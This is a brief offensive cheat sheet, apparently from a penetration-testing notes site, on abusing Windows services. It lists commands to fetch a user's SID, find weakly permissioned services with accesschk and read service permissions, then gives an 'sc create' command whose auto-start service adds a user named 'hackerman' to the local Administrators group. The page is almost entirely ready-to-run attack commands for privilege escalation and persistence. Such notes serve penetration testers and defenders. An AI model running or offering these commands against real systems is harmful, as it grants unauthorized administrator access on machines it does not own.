Windows_service_abuse
WINDOWS SERVICE ABUSE Show permissions of what users/groups can access this service.
wmic useraccount where name='username' get sid - this will give you your sid
accesschk.exe -uwcqv "Username" * /accepteula - this will show potentially vulnerable services
sc sdshow - this will show permissions of a service
Create service to execute commands
sc create MyService displayName= "MyService" binPath= "C:\Windows\System32\net.exe localgroup Administrators hackerman /add" start= auto
Last updated
Was this helpful?